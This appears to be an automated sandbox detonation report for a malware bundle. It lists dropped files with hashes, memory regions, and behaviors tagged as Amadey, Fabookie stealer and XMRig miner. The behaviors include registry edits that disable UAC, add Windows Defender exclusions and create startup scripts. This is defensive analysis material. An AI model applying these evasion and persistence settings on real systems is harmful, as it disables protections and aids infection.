memory/2408-358-0x00000000075C0000-0x0000000007B0D000-memory.dmp

memory/2144-359-0x0000000005C20000-0x0000000005C60000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b882308fbf3c5fc705d5f58bcfa19c46
SHA1 f7516182930026a7f3bdb767a1a28bc6b79980fc
SHA256 a29a0481375af1ef73aff05201cabcdfae4705200727695b473073a9508a7a74
SHA512 74b3d1e6226fdf7247da3f141fc4083036194d5f7980261d4d88e8f1204be51e267dde9d6c6d115fb4b6b695ed2aaf99b9318d6531ac30f30444c5a0a0d94313

memory/2152-390-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\513876443277

MD5 356b3305d25016cea3cdb630df29dcd1
SHA1 ada617e162c27c5afe55fed61bde337e8b8fafa5
SHA256 9e1cd9ed0044f7e13495edbacf768c26765d033b701635b2d9b8d8708a213859
SHA512 8e110dcc84e3f3499844091b53f624e4fac55b48c4d7ddb6317be0c4693bfd208872c103cfa3c9380f6c4317887d628a7b085c7b68810c99b0082c60f7f3fbb1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d2ff8f5e7a0d4f149833138af126e805
SHA1 369c345cb39c2c04482126a65a5e4e9654cbea20
SHA256 f84e9009d33d50e8ad9d72da3c748a9a306201f230988d44c39bbceace78ab71
SHA512 e5bcb3d61f191921e1cdea7d96f12423eb6a25ddb8641d229598da4dff037a8b615af8d84a859a0a38a6a962b85fb21479bcd5c8c79dc66899a66fd5bacc7a4d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 4767cff19b3fa365fad77a41dcb3dd77
SHA1 7e755e1025f2db292d5a1b117ac68afb533188cc
SHA256 61fa774b10c34feccf8199c43e2817a13634ad659e00a0ab19a9e0fd9df3eb78
SHA512 07978c8e0459f9e57177823278dc6665f16df222524b68d429d53b6a0d21de8a5755876f3598eb82b75001f575d4faf5c02f14b28dbfbed342e2579284a03170

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

memory/1580-409-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f82c338c005db1bfbb463497d2c11ff1
SHA1 d033825344ae304d0d8fb744eef130f4bc5b95ae
SHA256 b4b52d036e84b78ead5e3fbbb3d534aee216bcfa63e765d997394af4a5df6c59
SHA512 d7bdc2baccae1b2efb22e4c274277ab087ab62213eac325501ff5a9d43099bbbba3da18d03b3ba0234e2911d8b9e6d0f193690cfaa550edcfdc3652b45729eb6

memory/2144-423-0x0000000005C20000-0x0000000005C60000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4d871c70659195e2995ea96a791c2fb8
SHA1 081a9f32a3d3f4ebeb539833c7b32521bf3b52fc
SHA256 58799b32080f531a916b126dfb571aa5a65b1caf4e18c4b01940d9d11c53638a
SHA512 b6c6803b43cbd95dfe1d0b2f7655a3dcdfe4ec8a83a141af0d3b059b1116d98be7e7357fa8555ee9bf663736a65ad9a1045153696de476e5d6450946f402df76

\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/2976-444-0x0000000000DB0000-0x0000000000E34000-memory.dmp

memory/2976-445-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/2144-446-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/2976-447-0x0000000000240000-0x00000000002A2000-memory.dmp

memory/2976-448-0x000000001B000000-0x000000001B080000-memory.dmp

memory/2352-451-0x00000000032B0000-0x0000000003421000-memory.dmp

memory/2352-452-0x0000000002F40000-0x0000000003071000-memory.dmp

memory/2976-453-0x00000000024A0000-0x00000000024FE000-memory.dmp

memory/2276-454-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b6ae0eef6333fbf02caa2aff1f039f0d
SHA1 0bc43e76da64a2830bd0f7c50730350921175d24
SHA256 d16e70ee5557495181da67ba2709ac8e153a6e859f2cbb4f7779b51a9a7ef771
SHA512 6e981e063e71d17d0af16aee5598bd17975c6976db8911fedcef4a2114cb066f90791fe8c266d7fbb1b25ff047267c4fcd218f132038daa8f493c6ea48d87ae0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f0f76a1af2e18c54a3eafaa7b8d746cb
SHA1 fa360ecafc7f24f5228602570ccd08daf124164e
SHA256 e9804ae8575f88ad574f50cf9d6d54bcfcf70893b70da316de549a4745dee94e
SHA512 79a043b714d10697c5f52e700418eab61785c0c68281975c9c969ab3191f8983610518f56e446ec1f81b00f00f61a7b8789af42759654f2f265482fe6e91bac1

\Users\Admin\Pictures\Opera_installer_2310050832190201748.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G4TRZRLJFBZEL5VI6B5.temp

MD5 e22ada5183e1b100bcec0b82fd60149a
SHA1 d606ac4f834915662caeb74a93df52a857c382f7
SHA256 6109c49f702d7f05f9879f98d3207015fe1d5d00defe57f1f035f4107fe84cc1
SHA512 d036dfb368158e12feca4ca64a44fda84ce68e1bbfc7fcf7068a1dffeadd0b15880e85f3d308245b9173691446cf22a0a90ba25076d4b80a55ba8bf935647b2a

memory/2144-496-0x0000000005C20000-0x0000000005C60000-memory.dmp

memory/2524-497-0x000000001B300000-0x000000001B5E2000-memory.dmp

memory/2524-499-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/2524-500-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-498-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/2524-501-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/2524-502-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-503-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2144-504-0x0000000005C20000-0x0000000005C60000-memory.dmp

memory/2524-505-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-506-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/524-508-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2976-509-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/524-510-0x00000000006E0000-0x00000000007E0000-memory.dmp

memory/524-511-0x0000000000220000-0x000000000025E000-memory.dmp

memory/524-519-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2976-536-0x000000001B000000-0x000000001B080000-memory.dmp

memory/1580-543-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

memory/2352-544-0x0000000002F40000-0x0000000003071000-memory.dmp

memory/2156-548-0x0000000002820000-0x0000000002C18000-memory.dmp

memory/2156-552-0x0000000002C20000-0x000000000350B000-memory.dmp

memory/2156-554-0x0000000000400000-0x0000000000D62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/3008-562-0x000000006D110000-0x000000006D6BB000-memory.dmp

memory/3008-563-0x0000000000730000-0x0000000000770000-memory.dmp

C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/3008-566-0x000000006D110000-0x000000006D6BB000-memory.dmp

C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/1904-569-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

memory/2016-576-0x0000000002930000-0x0000000002D28000-memory.dmp

memory/524-582-0x00000000006E0000-0x00000000007E0000-memory.dmp

\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

\Users\Admin\AppData\Local\Temp\is-21URI.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-21URI.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

\Users\Admin\AppData\Local\Temp\is-21URI.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/3020-581-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/3020-580-0x0000000000250000-0x00000000002A1000-memory.dmp

memory/3020-579-0x0000000000780000-0x0000000000880000-memory.dmp

\Program Files (x86)\LightCleaner\LightCleaner.exe

MD5 b1c46e53e92ce5c1b673a60b2db081ac
SHA1 6ef5e9f1ee2f0a325c43c2d92447310097f9f5b3
SHA256 ef4b529c5f506bf8a58522aed1e5ae7ebfec2155130e90bd92f9403883046489
SHA512 a6708c915b68cabc62b8a356c91e1e4d8facd5b5c28050d39dd8c0486d0e84440d6f75b4bdd78c348d44138a1686b152f6042fdaae0f5d0fce3a31aa5b9b46a5

memory/3000-691-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2016-577-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1904-731-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1580-767-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2276-774-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2152-778-0x0000000000400000-0x000000000046A000-memory.dmp

memory/2016-794-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2156-835-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/3020-837-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3020-838-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/1748-858-0x00000000003E0000-0x000000000092D000-memory.dmp

memory/2956-870-0x0000000002220000-0x0000000002684000-memory.dmp

memory/524-872-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2016-873-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1308-874-0x000000013F280000-0x000000013F7C3000-memory.dmp

memory/2156-876-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2944-877-0x0000000002640000-0x0000000002A38000-memory.dmp

memory/2156-879-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2016-880-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1668-881-0x0000000002630000-0x0000000002A28000-memory.dmp

memory/1308-883-0x000000013F280000-0x000000013F7C3000-memory.dmp

memory/2956-893-0x0000000000400000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

memory/1308-910-0x000000013F280000-0x000000013F7C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Kenessey.txt

MD5 97384261b8bbf966df16e5ad509922db
SHA1 2fc42d37fee2c81d767e09fb298b70c748940f86
SHA256 9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c
SHA512 b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H

MD5 bca5375a8458228efd7e104d20e9b18d
SHA1 cf9454bf2880fde5a7d5be78e0000362e3e304ba
SHA256 656a2dc387ed866c3dd181e30e06687332c7ed40873e4b5359a3bf30db1fbbf8
SHA512 e2e365d66738c4968b8e79f66acd80906ed69a48e9044f252773a35f5c79f73a8949b93ada7738009b2e01b97fa6537d54144279175c055591b18da1a0391515

memory/2944-967-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2956-970-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/1668-971-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2956-972-0x0000000003490000-0x0000000003C82000-memory.dmp

memory/1308-973-0x000000013F280000-0x000000013F7C3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 08:31

Reported

2023-10-05 08:34

Platform

win10v2004-20230915-en

Max time kernel

66s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cacls.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mr2v54rRyCygPO8QL4Lf4JFs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aZn0sgOaQoyUgNHagt3UZ2En.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yzdpUzfhU9d2TVgTF5FoXtOl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FuDSSTop9aTNzLPoPAG28RMY.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Am9xT4BYi1Jd5dzawQQtaxBk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b7rbp88HUZY8kJ0XvF5Iwa2j.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wp9sqY4idBTVK7wKjRciwADk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPSh7m8vjpG3bsIfrXAlCBga.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9AKZzdqLT6PXw7pctOcyfYrU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jMm5sVd3PSzQImKdmPyizJ67.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PsoOdxuEl2SRE1qAgpeQQc0M.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpVjJTY5pgo9wKzgerQ9CsLa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P5lS5TJec1ParZK3GUMNueoe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe N/A
N/A N/A C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe N/A
N/A N/A C:\Users\Admin\Pictures\mBqwAQ7x1c2wgqXjsZvidhVR.exe N/A
N/A N/A C:\Users\Admin\Pictures\WqRErBJ2fgYIpOVkS9dklRTf.exe N/A
N/A N/A C:\Users\Admin\Pictures\OyA1qRZvlGEkxUlf5ta2wjyj.exe N/A
N/A N/A C:\Users\Admin\Pictures\fBw2KIeSuRIu2hvKQqV2OAj5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Ld6NiB2I7szMP32PfSypgDJh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3C9NQ.tmp\fBw2KIeSuRIu2hvKQqV2OAj5.tmp N/A
N/A N/A C:\Users\Admin\Pictures\b6fB4c7vk8eZgnrKGqsaZDP8.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MOONI.tmp\Ld6NiB2I7szMP32PfSypgDJh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\Pictures\WYqZjJ715NRV1fFSI9H7h7zz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-66CBQ.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f-e8204-190-c1f8e-2cd1775d4e82c\Xotofycidy.exe N/A
